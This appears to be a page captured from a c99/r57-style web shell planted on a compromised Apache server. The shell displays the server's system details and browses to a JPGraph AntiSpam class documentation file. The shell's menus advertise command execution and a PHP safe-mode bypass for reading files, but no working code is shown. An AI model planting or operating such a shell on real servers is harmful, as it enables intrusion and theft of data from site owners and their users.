Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/jpgraph/docs/ref/ drwxr-xr-x |
Viewing file: AntiSpam.html (7.74 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | CLASS AntiSpam
(Defined in: jpgraph_antispam.php : 546)
Class usage and Overview This module is used to create AntiSpam challenges that can be used to prevent automatic signup by robots on WEB-pages.
Class Methods
Description This method creates a new instance of the AntiSpam challenge. When the anti-spam imga eis created it is possible to directly use a supplied data string that should be displayed.
The data can also be added afterwards with a call to Set() Returns AntiSpamSee also AntiSpam::Set and AntiSpam::Rand
Example
Description Instead of specifying the string manually that should be used as a challenge the string can be automatically generated. This is done witha call to the Rand() method. Returns The generated spam challenge stringExample $rval = $antispam->Rand(); ...
Description This is an alternative way of specifying the AntiSpam string. This can also be specified in the initial creation of the ANtiSpam object ro be automatically generated with a call to the Rand() method See also AntiSpam::Rand
Example ... $antispam->Set($mySpamVal);
Description This sends the antispam image back to the browser or to an optional file named as the first and only argument. Returns VOIDSee also AntiSpam::AntiSpam and AntiSpam::Rand
Example $rval = $antispam->Rand(); ... $antispam->Stroke()
|
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0172 ]-- |